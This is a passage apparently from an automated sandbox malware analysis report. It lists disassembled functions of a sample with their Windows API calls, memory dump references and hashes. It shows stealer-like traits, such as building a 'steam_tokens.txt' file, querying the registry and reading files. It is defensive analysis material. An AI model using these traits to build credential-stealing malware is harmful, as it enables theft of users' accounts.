                                • lstrcat.KERNEL32(?,00CA1794), ref: 00C8EA7A
                                • lstrcat.KERNEL32(?,017988B8), ref: 00C8EA8D
                                • lstrcat.KERNEL32(?,00CA1794), ref: 00C8EA9F
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: 847d5954adc3a9d9aed1784dadbe9e9818c6728b3c1b26fca8f696d07797f90e
                                • Instruction ID: 24d13ca8e31b0d01db7d0096f6e91c70051ad9006771cb58e8a76aed81ed50e5
                                • Opcode Fuzzy Hash: 847d5954adc3a9d9aed1784dadbe9e9818c6728b3c1b26fca8f696d07797f90e
                                • Instruction Fuzzy Hash: 9E41BA71910118AFCB55EF64DC45EED77B8FF8D310F008464BA1AA7241DE70AF48AB94
                                Function 00C8ECB0 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C8ECDF
                                • lstrlen.KERNEL32(00000000), ref: 00C8ECF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8ED1D
                                • lstrlen.KERNEL32(00000000), ref: 00C8ED24
                                • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 00C8ED52
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: steam_tokens.txt
                                • API String ID: 367037083-401951677
                                • Opcode ID: 69b63e59c1ed42b933b577fdcf3d8b967b1cbc0b6f53497eab468242430313af
                                • Instruction ID: d0f1102389c47f70a65b472edbb4d789c3e9537b8734fe1787a790a90bedaa18
                                • Opcode Fuzzy Hash: 69b63e59c1ed42b933b577fdcf3d8b967b1cbc0b6f53497eab468242430313af
                                • Instruction Fuzzy Hash: EC31A232A111055FC722BB78EC4AA5E7BA8EF95314F09C030F85ADB212DB30DD09A7C5
                                Function 00C79A80 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,00C7140E), ref: 00C79A9A
                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00C7140E), ref: 00C79AB0
                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,00C7140E), ref: 00C79AC7
                                • ReadFile.KERNEL32(00000000,00000000,?,00C7140E,00000000,?,?,?,00C7140E), ref: 00C79AE0
                                • LocalFree.KERNEL32(?,?,?,?,00C7140E), ref: 00C79B00
                                • CloseHandle.KERNEL32(00000000,?,?,?,00C7140E), ref: 00C79B07
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                • Opcode ID: 3b7113b0635a0d9c52b91cd919fee5f9c5c97f1ee446cf89b1a9e40f7fa81460
                                • Instruction ID: 552007f762de492d623864746341e18143817123a65292c0c7ca8f84fb0e796f
                                • Opcode Fuzzy Hash: 3b7113b0635a0d9c52b91cd919fee5f9c5c97f1ee446cf89b1a9e40f7fa81460
                                • Instruction Fuzzy Hash: 48115171600209AFD720DF69DDC4AAA736CEB09350F108159F915A6180EB70ED04CB64
                                Function 00C95AD0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00C95B14
                                  • Part of subcall function 00C9A173: std::exception::exception.LIBCMT ref: 00C9A188
                                  • Part of subcall function 00C9A173: std::exception::exception.LIBCMT ref: 00C9A1AE
                                • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00C95B7C
                                • memmove.MSVCRT(00000000,?,?), ref: 00C95B89
                                • memmove.MSVCRT(00000000,?,?), ref: 00C95B98
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long
                                • API String ID: 2052693487-3788999226
                                • Opcode ID: e98fcee51cbf867511a44d39c47925bb8acd00f7a41182c98b9b3965bc33670d
                                • Instruction ID: acac515b4c4296ec142121205d3c6ea36248e815fb5021dde23d225d86109108
                                • Opcode Fuzzy Hash: e98fcee51cbf867511a44d39c47925bb8acd00f7a41182c98b9b3965bc33670d
                                • Instruction Fuzzy Hash: 46416071B006199FCF18DF6CC995AAEBBB5EB88710F158229E919E7784E630DD01CBD0
                                Function 00C87D40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00C87D58
                                  • Part of subcall function 00C9A1C0: std::exception::exception.LIBCMT ref: 00C9A1D5
                                  • Part of subcall function 00C9A1C0: std::exception::exception.LIBCMT ref: 00C9A1FB
                                • std::_Xinvalid_argument.LIBCPMT ref: 00C87D76
                                • std::_Xinvalid_argument.LIBCPMT ref: 00C87D91
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_$std::exception::exception
                                • String ID: invalid string position$string too long
                                • API String ID: 3310641104-4289949731
                                • Opcode ID: a7e686e7cb8e24ac0b6018fa81c680066170aa6bc8f2a9ac86de70138f9bc544
                                • Instruction ID: 4707ddfa0854a19e1392f4e7a53e7b20632613a11cc328e461ed9a8060df7d6d
                                • Opcode Fuzzy Hash: a7e686e7cb8e24ac0b6018fa81c680066170aa6bc8f2a9ac86de70138f9bc544
                                • Instruction Fuzzy Hash: 2321E4323082009FD724EE2CD880A3AB7E5AFD1759F304B6EE4528B741E770DD0183A9
                                Function 00C933C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C933EF
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C933F6
                                • GlobalMemoryStatusEx.KERNEL32 ref: 00C93411
                                • wsprintfA.USER32 ref: 00C93437
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB
                                • API String ID: 2922868504-2651807785
                                • Opcode ID: 266468577edb483355aee1659b3be035a69bc2f6b06c921d12f0c6e0f703f8e7
                                • Instruction ID: 53d614b27b34e04226fe56e328365d41dc70cdff31baa1575a30c38114777ed4
                                • Opcode Fuzzy Hash: 266468577edb483355aee1659b3be035a69bc2f6b06c921d12f0c6e0f703f8e7
                                • Instruction Fuzzy Hash: CA01D871A04258AFDB04DF99DD49B6EB7B8FB45710F004129FA06E7380D774A90086A5
                                Function 00C8D7B0 Relevance: 7.6, APIs: 5, Instructions: 127registrystringCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,0179DED0,00000000,00020119,?), ref: 00C8D7F5
                                • RegQueryValueExA.ADVAPI32(?,0179ED20,00000000,00000000,00000000,000000FF), ref: 00C8D819
                                • RegCloseKey.ADVAPI32(?), ref: 00C8D823
                                • lstrcat.KERNEL32(?,00000000), ref: 00C8D848
                                • lstrcat.KERNEL32(?,0179EE70), ref: 00C8D85C
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$CloseOpenQueryValue
                                • String ID:
                                • API String ID: 690832082-0
                                • Opcode ID: 4be8bf61aaccce7efc4f396548407752f4f7149e0527a2aea987cdd59911cbb6
                                • Instruction ID: 063c1be19482d680b2709329540c8fa53d1d78459aa3e18a8e30bac7cdee49d9
                                • Opcode Fuzzy Hash: 4be8bf61aaccce7efc4f396548407752f4f7149e0527a2aea987cdd59911cbb6
                                • Instruction Fuzzy Hash: A7414375A1010C9FCB58EF68EC86EDE77B4AF98304F008065B90DA7251EE30AA499F91
                                Function 00C87EE0 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 00C87F31
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C87F60
                                • StrCmpCA.SHLWAPI(00000000,00CA4C3C), ref: 00C87FA5
                                • StrCmpCA.SHLWAPI(00000000,00CA4C3C), ref: 00C87FD3
                                • StrCmpCA.SHLWAPI(00000000,00CA4C3C), ref: 00C88007
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 96bcc57a5fd2711ddda475d717cede6594985af3ecfa7aca530961279e90df61
                                • Instruction ID: 1bb093a6f299ba349710ae4e1e8a6400f121d9596fb617d539e6daf1b68cfeb7
                                • Opcode Fuzzy Hash: 96bcc57a5fd2711ddda475d717cede6594985af3ecfa7aca530961279e90df61
                                • Instruction Fuzzy Hash: 5141D13050411ADFCB20EF9AC880E9EB7B4FF55344B214198E90ADB351EB70EE65CB91
                                Function 00C88050 Relevance: 7.6, APIs: 5, Instructions: 114stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 00C880BB
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C880EA
                                • StrCmpCA.SHLWAPI(00000000,00CA4C3C), ref: 00C88102
                                • lstrlen.KERNEL32(00000000), ref: 00C88140
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8816F
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: c1032e26560bcc29b84cb4854f6c58a81e3dfe1e4c2da0e6d2e3f78c4bb02cbb
                                • Instruction ID: 77562b04a3fc3145ec6bd8856e7199e38be64031426041e2a265ca4f42a2c634
                                • Opcode Fuzzy Hash: c1032e26560bcc29b84cb4854f6c58a81e3dfe1e4c2da0e6d2e3f78c4bb02cbb
                                • Instruction Fuzzy Hash: 9F419F716001069FCB21EF6DD948BAEBBF4EF45304F15841CA859D7645EF34EA49CB90
                                Function 00C91B20 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 00C91B72
                                  • Part of subcall function 00C91820: lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C9184F
                                  • Part of subcall function 00C91820: lstrlen.KERNEL32(01786EE0), ref: 00C91860
                                  • Part of subcall function 00C91820: lstrcpy.KERNEL32(00000000,00000000), ref: 00C91887
                                  • Part of subcall function 00C91820: lstrcat.KERNEL32(00000000,00000000), ref: 00C91892
                                  • Part of subcall function 00C91820: lstrcpy.KERNEL32(00000000,00000000), ref: 00C918C1
                                  • Part of subcall function 00C91820: lstrlen.KERNEL32(00CA4FA0), ref: 00C918D3
                                  • Part of subcall function 00C91820: lstrcpy.KERNEL32(00000000,00000000), ref: 00C918F4
                                  • Part of subcall function 00C91820: lstrcat.KERNEL32(00000000,00CA4FA0), ref: 00C91900
                                  • Part of subcall function 00C91820: lstrcpy.KERNEL32(00000000,00000000), ref: 00C9192F
                                • sscanf.NTDLL ref: 00C91B9A
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C91BB6
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C91BC6
                                • ExitProcess.KERNEL32 ref: 00C91BE3
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
